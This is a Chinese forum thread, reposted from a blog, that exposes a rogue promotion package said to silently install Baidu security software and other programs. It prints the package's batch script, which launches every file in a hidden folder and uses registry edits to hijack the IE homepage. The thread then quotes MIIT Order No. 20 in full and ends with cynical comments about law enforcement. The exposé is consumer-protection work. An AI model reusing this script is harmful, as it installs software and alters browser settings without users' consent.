揭穿百度“不胁迫”的谎言——曝光今年二月遇到的百度杀毒系列流氓推广运行全过程

tg123321

原文转自本人新浪博客：http://blog.sina.com.cn/s/blog_4def6b600101fgvx.html
很多国产软件都拥有自己的推广联盟，推广一个可以拿到回扣，于是出现了很多无节操的流氓推广，这里介绍笔者今天看到的一个。

     这个网友似乎回答的很详细，还给了一个“软件”，这个“软件”通过了百度安全检测，应该是无毒的。是不是这样呢？好，我们下载下来看看。



  嗯，是刚才那个文件。现在我们把它解压到C:\ProgramData\Shared Space下看看


任意打开其中一个快捷方式，目标指向一个bat文件。

bat文件批处理代码如下，有一定计算机水平的人应该可以看懂
@echo off
start iexplore.exe http://fuhaowang.net/chakaifang.html   （启动ie浏览器打开网页）
for /f "delims=" %%a in ('dir temp\  /s /b /a-d^|findstr /v /i "Rea.BAT"') do (start "" "%%a")
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d "http://www.duba.com/?un_426198_1116" /f >nul 2>nul
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d "http://www.duba.com/?un_426198_1116" /f >nul 2>nul  （修改用户ie浏览器主页）
exit
这里我们就想不通了，这玩意儿修改浏览器主页干啥？别急，好戏还在后面。我们先运行看看。


好家伙，自己在安装百度卫士，我要你安装了吗？（默认是在后台安装，这里笔者将其调了出来，一般用户根本不会察觉）再一看后台，卫士和杀毒都来了。。。。。。（上面一排是笔者的安全软件，下面一排是百度卫士和百度杀毒的安装程序）


这里为了方便，笔者故意让笔者的安全软件拦截了其他软件的安装，贴出日志：


根据病毒创建的隐藏文件夹temp，我们可以看出病毒将安装在笔者电脑上的7款软件：

试问，如此偷偷在用户电脑上植入“安全软件”，软件厂商们良心何在？节操何在？法律又去哪里了？

（附）中华人民共和国工业和信息化部令
第20号


　　《规范互联网信息服务市场秩序若干规定》已经2011年12月7日中华人民共和国工业和信息化部第22次部务会议审议通过，现予公布，自2012年3月15日起施行。



                             
                                                                                                                   部长：苗圩
                                                                         二〇一一年十二月二十九日


规范互联网信息服务市场秩序若干规定

第一条 为了规范互联网信息服务市场秩序，保护互联网信息服务提供者和用户的合法权益，促进互联网行业的健康发展，根据《中华人民共和国电信条例》、《互联网信息服务管理办法》等法律、行政法规的规定，制定本规定。
第二条 在中华人民共和国境内从事互联网信息服务及与互联网信息服务有关的活动，应当遵守本规定。
第三条 工业和信息化部和各省、自治区、直辖市通信管理局（以下统称“电信管理机构”）依法对互联网信息服务活动实施监督管理。
第四条 互联网信息服务提供者应当遵循平等、自愿、公平、诚信的原则提供服务。
第五条 互联网信息服务提供者不得实施下列侵犯其他互联网信息服务提供者合法权益的行为：
（一）恶意干扰用户终端上其他互联网信息服务提供者的服务，或者恶意干扰与互联网信息服务相关的软件等产品（“与互联网信息服务相关的软件等产品”以下简称“产品”）的下载、安装、运行和升级；
（二）捏造、散布虚假事实损害其他互联网信息服务提供者的合法权益，或者诋毁其他互联网信息服务提供者的服务或者产品；
（三）恶意对其他互联网信息服务提供者的服务或者产品实施不兼容；
（四）欺骗、误导或者强迫用户使用或者不使用其他互联网信息服务提供者的服务或者产品；
（五）恶意修改或者欺骗、误导、强迫用户修改其他互联网信息服务提供者的服务或者产品参数；
（六）其他违反国家法律规定，侵犯其他互联网信息服务提供者合法权益的行为。
第六条 对互联网信息服务提供者的服务或者产品进行评测，应当客观公正。
评测方公开或者向用户提供评测结果的，应当同时提供评测实施者、评测方法、数据来源、用户原始评价、评测手段和评测环境等与评测活动相关的信息。评测结果应当真实准确，与评测活动相关的信息应当完整全面。被评测的服务或者产品与评测方的服务或者产品相同或者功能类似的，评测结果中不得含有评测方的主观评价。
被评测方对评测结果有异议的，可以自行或者委托第三方就评测结果进行再评测，评测方应当予以配合。
评测方不得利用评测结果，欺骗、误导、强迫用户对被评测方的服务或者产品作出处置。
本规定所称评测，是指提供平台供用户评价，或者以其他方式对互联网信息服务或者产品的性能等进行评价和测试。
第七条 互联网信息服务提供者不得实施下列侵犯用户合法权益的行为：
（一）无正当理由拒绝、拖延或者中止向用户提供互联网信息服务或者产品；
（二）无正当理由限定用户使用或者不使用其指定的互联网信息服务或者产品；
（三）以欺骗、误导或者强迫等方式向用户提供互联网信息服务或者产品；
（四）提供的互联网信息服务或者产品与其向用户所作的宣传或者承诺不符；
（五）擅自改变服务协议或者业务规程，降低服务质量或者加重用户责任；
（六）与其他互联网信息服务提供者的服务或者产品不兼容时，未主动向用户提示和说明；
（七）未经提示并由用户主动选择同意，修改用户浏览器配置或者其他设置；
（八）其他违反国家法律规定，侵犯用户合法权益的行为。
第八条 互联网信息服务提供者在用户终端上进行软件下载、安装、运行、升级、卸载等操作的，应当提供明确、完整的软件功能等信息，并事先征得用户同意。
互联网信息服务提供者不得实施下列行为：
（一）欺骗、误导或者强迫用户下载、安装、运行、升级、卸载软件；
    （二）未提供与软件安装方式同等或者更便捷的卸载方式；
（三）在未受其他软件影响和人为破坏的情况下，未经用户主动选择同意，软件卸载后有可执行代码或者其他不必要的文件驻留在用户终端。
第九条 互联网信息服务终端软件捆绑其他软件的，应当以显著的方式提示用户，由用户主动选择是否安装或者使用，并提供独立的卸载或者关闭方式，不得附加不合理条件。
第十条 互联网信息服务提供者在用户终端弹出广告或者其他与终端软件功能无关的信息窗口的，应当以显著的方式向用户提供关闭或者退出窗口的功能标识。
第十一条 未经用户同意，互联网信息服务提供者不得收集与用户相关、能够单独或者与其他信息结合识别用户的信息（以下简称“用户个人信息”），不得将用户个人信息提供给他人，但是法律、行政法规另有规定的除外。
互联网信息服务提供者经用户同意收集用户个人信息的，应当明确告知用户收集和处理用户个人信息的方式、内容和用途，不得收集其提供服务所必需以外的信息，不得将用户个人信息用于其提供服务之外的目的。
    第十二条 互联网信息服务提供者应当妥善保管用户个人信息；保管的用户个人信息泄露或者可能泄露时，应当立即采取补救措施；造成或者可能造成严重后果的，应当立即向准予其互联网信息服务许可或者备案的电信管理机构报告，并配合相关部门进行的调查处理。
第十三条 互联网信息服务提供者应当加强系统安全防护，依法维护用户上载信息的安全，保障用户对上载信息的使用、修改和删除。
互联网信息服务提供者不得有下列行为：
（一）无正当理由擅自修改或者删除用户上载信息；
（二）未经用户同意，向他人提供用户上载信息，但是法律、行政法规另有规定的除外；
（三）擅自或者假借用户名义转移用户上载信息，或者欺骗、误导、强迫用户转移其上载信息；
    （四）其他危害用户上载信息安全的行为。
    第十四条 互联网信息服务提供者应当以显著的方式公布有效联系方式，接受用户及其他互联网信息服务提供者的投诉，并自接到投诉之日起十五日内作出答复。
第十五条 互联网信息服务提供者认为其他互联网信息服务提供者实施违反本规定的行为，侵犯其合法权益并对用户权益造成或者可能造成重大影响的，应当立即向准予该其他互联网信息服务提供者互联网信息服务许可或者备案的电信管理机构报告。
电信管理机构应当对报告或者发现的可能违反本规定的行为的影响进行评估；影响特别重大的，相关省、自治区、直辖市通信管理局应当向工业和信息化部报告。电信管理机构在依据本规定作出处理决定前，可以要求互联网信息服务提供者暂停有关行为，互联网信息服务提供者应当执行。
第十六条 互联网信息服务提供者违反本规定第五条、第七条或者第十三条的规定，由电信管理机构依据职权责令改正，处以警告，可以并处一万元以上三万元以下的罚款，向社会公告；其中，《中华人民共和国电信条例》或者《互联网信息服务管理办法》规定法律责任的，依照其规定处理。
第十七条 评测方违反本规定第六条的规定的，由电信管理机构依据职权处以警告，可以并处一万元以上三万元以下的罚款，向社会公告。
第十八条 互联网信息服务提供者违反本规定第八条、第九条、第十条、第十一条、第十二条或者第十四条的规定的，由电信管理机构依据职权处以警告，可以并处一万元以上三万元以下的罚款，向社会公告。
    第十九条 互联网信息服务提供者违反本规定第十五条规定，不执行电信管理机构暂停有关行为的要求的，由电信管理机构依据职权处以警告，向社会公告。
第二十条 互联网信息服务提供者违反其他法律、行政法规规定的，依照其规定处理。
第二十一条 本规定自2012年3月15日起施行。

度娘天天喊360违反了工信部20号令，他自己做到过没有？

zmyx279323199

有法缺少执法人，不知那些人天天在干啥

Eif-Hill

仙法（xianfa）都不知道是什么的，其他神马法就算啦

复读Z

法律是强者欺压弱者的工具。法律才不会管我们这些老百姓。

wc243696

论军权的重要性

jeleo

没有监管、没有执法，就是个口号而已。

qiaqiaqia

每天喊好听口号的很可能就是流氓

飞扬丶

你还真信中国的法律啊  有钱有权  杀人都没事啊
那些法律都是为平民老百姓 制定的

小七龙瑜

飞扬丶 发表于 2015-1-5 17:12
你还真信中国的法律啊  有钱有权  杀人都没事啊
那些法律都是为平民老百姓 制定的

中国大陆的法律

曾经是TXT

现在勉强算是DOC但宪法还是TXT

估计有生之年是不会变成EXE了

白露为霜

不认为政府要管